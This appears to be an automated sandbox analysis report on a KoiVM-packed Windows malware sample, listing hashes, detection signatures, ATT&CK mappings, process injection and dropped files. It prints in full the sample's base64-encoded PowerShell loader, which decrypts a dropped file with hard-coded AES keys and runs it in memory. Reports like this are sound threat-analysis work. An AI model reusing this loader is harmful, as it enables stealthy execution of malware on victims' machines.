7720a4773bb9f84fb99c558b115bd274d090bc15c6767e4211e50d5dd7872f66

General

Target

7720a4773bb9f84fb99c558b115bd274d090bc15c6767e4211e50d5dd7872f66.exe
Size

967KB
MD5

d3a9f004ba265edd72885e34c49f673d
SHA1

4ce4a1edae2381eef1f8b1e4977aa97e8f1a2c12
SHA256

7720a4773bb9f84fb99c558b115bd274d090bc15c6767e4211e50d5dd7872f66
SHA512

2824c5a3d6e059d22319c8c9fdd5287e35a73a00fa8ecaa296eb4459520c743d8685396f69c6924771bc1e1dea07db4cb7472a2866d9d27b6ea12c0d4d765bd8
SSDEEP

24576:H44YhHQqHxaH6gHHOgGlkj1rZKVgRI2joSG:Hud9HYaw7rXmKG

Score

9^/10

execution

Malware Config

Signatures

Detects executables packed with or use KoiVM 1 IoCs

resource	yara_rule
behavioral2/memory/3832-16-0x000001C89C240000-0x000001C89C2C8000-memory.dmp	INDICATOR_EXE_Packed_KoiVM

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3832	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3832	powershell.exe
3832	powershell.exe
3832	powershell.exe
3832	powershell.exe
3832	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3832	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1652 wrote to memory of 3832	1652	7720a4773bb9f84fb99c558b115bd274d090bc15c6767e4211e50d5dd7872f66.exe	84
PID 1652 wrote to memory of 3832	1652	7720a4773bb9f84fb99c558b115bd274d090bc15c6767e4211e50d5dd7872f66.exe	84

C:\Users\Admin\AppData\Local\Temp\7720a4773bb9f84fb99c558b115bd274d090bc15c6767e4211e50d5dd7872f66.exe
"C:\Users\Admin\AppData\Local\Temp\7720a4773bb9f84fb99c558b115bd274d090bc15c6767e4211e50d5dd7872f66.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA5ADYALAAgADAAeABGAEUALAAgADAAeAA2AEUALAAgADAAeAA0ADcALAAgADAAeABEADMALAAgADAAeABCAEMALAAgADAAeABDAEQALAAgADAAeAA2ADkALAAgADAAeAAwADIALAAgADAAeAAzAEUALAAgADAAeAA3ADAALAAgADAAeAAxADEALAAgADAAeABCAEMALAAgADAAeAAwADUALAAgADAAeAA5AEIALAAgADAAeAAzADAALAAgADAAeAA3AEQALAAgADAAeAA4ADAALAAgADAAeAA3AEYALAAgADAAeABEADcALAAgADAAeABCADAALAAgADAAeAA0ADQALAAgADAAeAAwADAALAAgADAAeABGADkALAAgADAAeAA5ADcALAAgADAAeAA1ADYALAAgADAAeABBAEQALAAgADAAeAA4ADYALAAgADAAeABEADgALAAgADAAeAAxADAALAAgADAAeAA4ADcALAAgADAAeABGADAAKQAKACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA4ADUALAAgADAAeABGADYALAAgADAAeAA4AEIALAAgADAAeABEAEEALAAgADAAeABEAEQALAAgADAAeAAxAEEALAAgADAAeAAwADkALAAgADAAeABEADYALAAgADAAeAAwAEUALAAgADAAeAA3ADcALAAgADAAeAA4ADcALAAgADAAeAA1AEIALAAgADAAeAAzAEYALAAgADAAeAA1AEYALAAgADAAeABFADAALAAgADAAeABGADEAKQAKAAoAaQBmACAAKAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAKACAAIAAgACAAJAAfBEMEQgRMBCQEMAQ5BDsEMAQgAD0AIAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsELgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAFwQwBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQRBDAEOQRCBEsEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAB8EQwRCBEwEJAQwBDkEOwQwBCkAOwAKACAAIAAgACAAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQgAD0AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAC0AGgQ7BE4ERwQgACQAGgQ7BE4ERwQgAC0AGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAC0AFAQwBD0EPQRLBDUEIAAkABcEMARIBDgERARABD4EMgQwBD0EPQRLBDUEEQQwBDkEQgRLBAoACgAgACAAIAAgACQAIQQxBD4EQAQ6BDAEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAYgB5AHQAZQBbAF0AXQBAACgAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQpACkAOwAKACAAIAAgACAAJAAiBD4ERwQ6BDAEEgRFBD4ENAQwBCAAPQAgACQAIQQxBD4EQAQ6BDAELgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQAIgQ+BEcEOgQwBBIERQQ+BDQEMAQuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AAoAfQAKAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zucljrea.uvr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\file-13117.putik

Filesize
20KB

MD5
bbe1d8c160f3469ee9597f7545aa1831

SHA1
b4a91b271fb726fbf5fcebc2fd074e00903e0a8c

SHA256
16d4ad67a7560d357ead7f47264f7ca7cce06d0a1d74073b10047e22b1904dc8

SHA512
3fd84612c20fd61adecaf1ba9c68605d4c37193f3740dc191431ce0028c10b616ca5c6845292f36c99ad5d8914f0d0e7ccf25cd89f595ce8d02478536a4d7a4a

Download Submit
memory/3832-1-0x00007FFC36DE3000-0x00007FFC36DE5000-memory.dmp

Filesize
8KB

Download
memory/3832-11-0x000001C883980000-0x000001C8839A2000-memory.dmp

Filesize
136KB

Download
memory/3832-12-0x00007FFC36DE0000-0x00007FFC378A1000-memory.dmp

Filesize
10.8MB

Download
memory/3832-13-0x00007FFC36DE0000-0x00007FFC378A1000-memory.dmp

Filesize
10.8MB

Download
memory/3832-15-0x000001C8838A0000-0x000001C8838AA000-memory.dmp

Filesize
40KB

Download
memory/3832-16-0x000001C89C240000-0x000001C89C2C8000-memory.dmp

Filesize
544KB

Download
memory/3832-17-0x00007FFC36DE0000-0x00007FFC378A1000-memory.dmp

Filesize
10.8MB

Download
memory/3832-18-0x00007FFC36DE3000-0x00007FFC36DE5000-memory.dmp

Filesize
8KB

Download
memory/3832-19-0x00007FFC36DE0000-0x00007FFC378A1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing